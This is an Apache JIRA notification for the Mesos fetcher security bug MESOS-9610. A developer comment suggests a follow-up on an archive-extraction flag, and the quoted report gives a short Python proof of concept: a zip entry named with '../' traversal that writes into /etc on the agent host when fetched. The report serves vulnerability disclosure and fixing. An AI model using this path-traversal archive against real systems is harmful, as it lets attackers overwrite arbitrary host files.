[ https://issues.apache.org/jira/browse/MESOS-9610?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16787285#comment-16787285 ]
Gilbert Song commented on MESOS-9610: ------------------------------------- Probably we could create a separate JIRA to follow up on *ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS*? cc [~mderela] [~kaysoky] > Fetcher vulnerability - escaping from sandbox > --------------------------------------------- > > Key: MESOS-9610 > URL: https://issues.apache.org/jira/browse/MESOS-9610 > Project: Mesos > Issue Type: Bug > Components: fetcher > Affects Versions: 1.7.2 > Reporter: Mariusz Derela > Assignee: Joseph Wu > Priority: Blocker > Labels: bug, foundations, security-issue, vulnerabilities > Fix For: 1.8.0, 1.7.3 > > > I have noticed that there is a possibility to exploit fetcher and overwrite > any file on the agent host. > scenario to reproduce: > 1) prepare a file with any content and name a file like "../../../etc/test" > and archive it. We can use python and zipfile module to achieve that: > {code:java} > >>> import zipfile > >>> zip = zipfile.ZipFile("exploit.zip", "w") > >>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt", > >>> "some content") > >>> zip.close() > {code} > 2) prepare a service that will use our artifact (exploit.zip) > 3) run service > at the end in /etc we will get our file. As you can imagine there is a lot > possibility how we can use it. > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)